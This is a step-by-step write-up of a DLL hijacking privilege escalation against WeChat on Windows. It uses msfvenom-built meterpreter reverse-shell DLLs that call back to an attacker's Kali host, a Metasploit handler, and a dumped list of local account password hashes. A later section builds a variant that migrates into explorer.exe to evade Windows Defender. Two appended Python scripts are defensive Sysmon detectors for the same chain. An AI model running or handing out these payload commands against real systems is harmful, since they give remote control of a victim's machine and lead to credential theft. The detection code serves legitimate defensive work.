Reproducing a Local WeChat DLL Hijacking Privilege Escalation
I. Analyzing WeChat's DLLs
1. Analysis with Huorong Sword
Work out which DLL files WeChat loads when it starts.
Then replace them with the trojan, one at a time, until the trojan gets executed.
2. Generating the trojan
# Start msf
┌──(root㉿kali-3)-[/home/sword]
└─# msfdb run
[i] Database already started
# Generate the DLL trojan
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f dll -o shell.dll
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f dll -o shell.dll
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
# Check the trojan file
msf6 > ls
[*] exec: ls
shell.dll shell.exe
3. Replacing the file
Go into WeChat's DLL directory and rename shell.dll to the file name of the DLL being tested.
Then set up a listener on Kali.
4. Listening on Kali
# Enter the handler module
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
# Show the options
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
# Set the listen address
msf6 exploit(multi/handler) > set lhost 192.168.88.140
lhost => 192.168.88.140
# Change the payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
# Run the module
msf6 exploit(multi/handler) > run
5. Start WeChat and watch the listener
After replacing a DLL, WeChat would not open at all, so we had to restore that DLL file and move on to replacing the next one.
Restart WeChat and watch the listening port again.
# Background the session
meterpreter > bg
[*] Backgrounding session 2...
# List sessions
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                       Connection
  --  ----  ----                     -----------                                                       ----------
  2         meterpreter x64/windows  DESKTOP-74FDETH\Administrator @ DESKTOP-74FDETH (192.168.88.131)  192.168.88.140:4444 -> 192.168.88.131:49919

A shell has connected back.
WeChat itself does not run normally, but the session can be used directly.
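From the defender's side, the procedure above leaves a clear trace: a module with a known file name is loaded from the application directory, but it is unsigned and its hash no longer matches what was installed. The following checker is an added example, not code from the original post; its field names follow Sysmon Event ID 7 (ImageLoad), and every file name, hash and signer name in it is constructed for the demo (the `libapp.dll`/`libui.dll` names and `Example Vendor Ltd` are placeholders, not WeChat's real modules or signer).

```python
"""
Added example, not from the original post: a small checker for the DLL
hijack pattern reproduced above. Field names follow Sysmon Event ID 7
(ImageLoad); every path, hash and signer below is constructed for the demo.
"""
from dataclasses import dataclass

# Directory the post replaces DLLs in; the checker only inspects loads from here.
APP_DIR = r"c:\program files\tencent\wechat"

# Constructed baseline an administrator would record at install time:
# module path -> SHA256 of the shipped file (hypothetical names and values).
BASELINE = {
    APP_DIR + r"\libapp.dll": "11" * 32,
    APP_DIR + r"\libui.dll": "22" * 32,
}

# Signer name recorded with the baseline (placeholder, not the real vendor string).
EXPECTED_SIGNER = "Example Vendor Ltd"


@dataclass
class ImageLoad:
    image: str          # Sysmon Image: process that loaded the module
    image_loaded: str   # Sysmon ImageLoaded: full path of the module
    signed: bool        # Sysmon Signed
    signature: str      # Sysmon Signature (signer name), "" when unsigned
    sha256: str         # taken from the Sysmon Hashes field


def check_image_load(ev: ImageLoad) -> list[str]:
    """Return the reasons a module load looks hijacked; [] means it matches the baseline."""
    path = ev.image_loaded.lower()
    if not path.startswith(APP_DIR + "\\"):
        return []               # system DLLs etc. are out of scope for this check
    findings = []
    expected = BASELINE.get(path)
    if expected is None:
        findings.append("module is not in the install baseline")
    elif ev.sha256.lower() != expected:
        findings.append("SHA256 differs from baseline")
    if not ev.signed:
        findings.append("module is unsigned")
    elif ev.signature != EXPECTED_SIGNER:
        findings.append(f"unexpected signer: {ev.signature}")
    return findings


def scan(events: list[ImageLoad]) -> dict[str, list[str]]:
    """Map each suspicious module path to its findings."""
    report = {}
    for ev in events:
        findings = check_image_load(ev)
        if findings:
            report[ev.image_loaded] = findings
    return report


# Constructed sample: a clean load, a system DLL (ignored), and a load of a file
# that kept its baseline name but is now an unsigned DLL with a different hash,
# which is exactly what dropping an msfvenom DLL over the original produces.
WECHAT = r"C:\Program Files\Tencent\WeChat\WeChat.exe"
SAMPLE_EVENTS = [
    ImageLoad(WECHAT, r"C:\Program Files\Tencent\WeChat\libui.dll", True, EXPECTED_SIGNER, "22" * 32),
    ImageLoad(WECHAT, r"C:\Windows\System32\kernel32.dll", True, "Microsoft Windows", "33" * 32),
    ImageLoad(WECHAT, r"C:\Program Files\Tencent\WeChat\libapp.dll", False, "", "ab" * 32),
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_EVENTS).items():
        print(path, "->", "; ".join(reasons))
```

Run as-is it reports only the third event, with both a hash mismatch and the missing signature. The same logic is what a file-integrity baseline or an EDR rule applies; the point of keeping a per-file hash rather than just a signer check is that a dropped DLL which happens to be signed by some other publisher is still caught.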
II. Carrying out the DLL hijacking privilege escalation
1. Upload the trojan to the target host
Replace the file directly.
2. Switch to the administrator user and open WeChat
# Enter the session
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
# Check the current user
meterpreter > getuid
Server username: DESKTOP-74FDETH\Administrator
# Current process
meterpreter > getpid
Current pid: 7472
# Drop into a cmd shell
meterpreter > shell
Process 3684 created.
Channel 1 created.
Microsoft Windows [版本 10.0.17134.228]
(c) 2018 Microsoft Corporation。保留所有权利。
# Check privileges
C:\Program Files\Tencent\WeChat>whoami
whoami
desktop-74fdeth\administrator
# Exit cmd
C:\Program Files\Tencent\WeChat>exit
exit
# Dump the local user accounts from the SAM database
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3984bd4d943547bcd12b850029d030e2:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1000:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1a844c57772d66f99bab4450eee6ccce:::
meterpreter >
This completes the DLL hijacking privilege escalation.
III. Process-injecting trojan
In some reproductions the trojan does not stay up for long and goes offline by itself.
This is probably due to Windows Defender.
So we need to switch to a process-injecting trojan.
1. Generating the trojan
# Process-injecting trojan
msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.140 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f dll > explorer.dll
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.88.140 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f dll > explorer.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 901 bytes
Final size of dll file: 8704 bytes
msf6 > ls
[*] exec: ls
公共 模板 视频 图片 文档 下载 音乐 桌面 explorer.dll shell
2. Uploading the trojan
# Start an HTTP server
msf6 > python -m http.server 80
[*] exec: python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Fetch the file from Kali's HTTP server.
3. Replacing the file
Kill the WeChat process that was just opened.
Replace the file.
4. Watching Kali's listening port
Switch to the administrator user, run WeChat, and watch Kali's listening port.
It comes back online, and this time there are no real problems.
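The `prependmigrate` payload above moves the implant out of the WeChat process and into explorer.exe. That requires the WeChat process to start a thread inside explorer.exe, and when this is done through CreateRemoteThread, Sysmon records it as Event ID 8 with the source and target images and the start module of the new thread. The following triage routine is an added example, not code from the original post; its field names follow Sysmon Event ID 8 (CreateRemoteThread), the allowlist entries are hypothetical, and every event value is constructed.

```python
"""
Added example, not from the original post: flag the cross-process thread that
migrating a payload into explorer.exe produces. Field names follow Sysmon
Event ID 8 (CreateRemoteThread); every path and value below is constructed.
"""
from dataclasses import dataclass

# Constructed allowlist of source images an administrator has verified to
# create remote threads legitimately on this host (hypothetical entries).
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
}

# Long-lived processes that are commonly chosen as migration targets;
# explorer.exe is the one the post uses.
MIGRATION_TARGETS = {"explorer.exe", "svchost.exe"}


@dataclass
class RemoteThread:
    source_image: str    # Sysmon SourceImage
    target_image: str    # Sysmon TargetImage
    start_module: str    # Sysmon StartModule, "" when not backed by a loaded module
    start_function: str  # Sysmon StartFunction, "" when unknown


def score_remote_thread(ev: RemoteThread) -> list[str]:
    """Return indicators for one event; [] means the source is allowlisted."""
    src = ev.source_image.lower()
    tgt = ev.target_image.lower()
    if src in ALLOWED_SOURCES:
        return []
    findings = [f"{src} created a thread in {tgt}"]
    if ev.start_module == "":
        # A thread whose start address is in no loaded module is the signature
        # of injected code rather than a call into a legitimate DLL export.
        findings.append("thread starts outside any loaded module (injected code)")
    if tgt.rsplit("\\", 1)[-1] in MIGRATION_TARGETS:
        findings.append("target is a long-lived host process favoured for migration")
    return findings


def triage(events: list[RemoteThread]) -> list[tuple[str, list[str]]]:
    """Return (source image, findings) for every event that is not allowlisted."""
    hits = []
    for ev in events:
        findings = score_remote_thread(ev)
        if findings:
            hits.append((ev.source_image, findings))
    return hits


# Constructed sample: one benign allowlisted event and one that matches the
# migration step from the post (WeChat.exe -> explorer.exe, unbacked start address).
SAMPLE_EVENTS = [
    RemoteThread(r"C:\Windows\System32\csrss.exe", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\ntdll.dll", "RtlUserThreadStart"),
    RemoteThread(r"C:\Program Files\Tencent\WeChat\WeChat.exe", r"C:\Windows\explorer.exe",
                 "", ""),
]

if __name__ == "__main__":
    for source, reasons in triage(SAMPLE_EVENTS):
        print(source, "->", "; ".join(reasons))
```

A messaging client has no business creating threads in the shell, so on a real host the second event would be rare enough to alert on by itself; the empty `StartModule` and the explorer.exe target are what push it from "odd" to "investigate now". Pair this with the image-load check from section I and the host shows both halves of the chain: the swapped DLL and the hop into explorer.exe.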